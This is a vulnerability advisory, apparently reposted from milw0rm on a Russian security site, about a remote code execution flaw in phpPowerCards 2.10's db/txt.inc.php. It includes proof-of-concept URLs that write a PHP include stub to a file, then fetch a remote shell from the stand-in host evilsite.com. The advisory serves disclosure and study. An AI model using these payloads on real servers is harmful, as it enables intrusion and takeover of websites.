Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  Power Phlogger 2.0.9 Remote|Local File Include Vulnerability

  Segue CMS <= 1.5.8 (themesdir) Remote File Include Vulnerability

  Active Bulletin Board v1.1 beta2 (doprofiledit.
asp) Remote User Pass Change

  WGCC Beta <= 0.5.6 (quiz.php) Remote SQL InJection Vulnerability

From:nuffsaid <nuffsaid_(at)_newbslove.us>
Date:23 октября 2006 г.
Subject:phpPowerCards 2.10 (txt.inc.php) Remote Code Execution Vulnerability

+--------------------------------------------------------------------------------
-----------
+ phpPowerCards 2.10 (txt.inc.php) Remote Code Execution Vulnerability
+--------------------------------------------------------------------------------
-----------
+ Affected Software .: phpPowerCards 2.10
+ Vendor ............: http://www.giombetti.com/
+ Download ..........: http://lu.download.giombetti.com/phpPowerCards/phppowercards2.10.zip
+ Description .......: "phpPowerCards is a powerfull PHP based postcard script."
+ Class .............: Remote Code Execution
+ Risk ..............: High (Remote Code Execution)
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
+--------------------------------------------------------------------------------
-----------
+ Details:
+ phpPowerCards db/txt.inc.php does not initialize the $file variable before using it in the
+ fopen() function on line 10, after $file is opened it then writes several variables which
+ are also uninitialized to $file using the fputs() function. Assuming register_globals = on,
+ we can initialize these variables in a query string and then write anything to a file we
+ desire on the target box that's running phpPowerCards.
+
+ Vulnerable Code:
+ db/txt.inc.php, line(s) 10: $fp = fopen("$file","a");
+ db/txt.inc.php, line(s) 23: fputs($fp, $email[to]. "¦¦" .$email[from]. "¦¦" .$name[to]. "¦¦" .$name[from]. "¦¦" .$picture. "¦¦" .$comment. "¦¦" .$sessionID. "\n");
+
+ Proof of Concept:
+ http://[target]/[path]/db/txt.inc.
php?file=[file]&check=0&email[to]=[evil code]
+ http://[target]/[path]/db/txt.inc.php?file=[file]&check=0&comment=[evil code]
+ ... same thing repeated for each variable in the second argument of fputs() on line 23
+
+ -> http://[target]/[path]/db/txt.inc.php?file=../evilfile.
php&check=0&email[to]=+%3C%3Fphp+include%28%24evil_includ
e%29%3B+%3F%3E+
+ -> http://[target]/[path]/evilfile.php?evil_include=http://evilsite.com/shell.php
+--------------------------------------------------------------------------------
-----------

# milw0rm.com [2006-10-18]

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород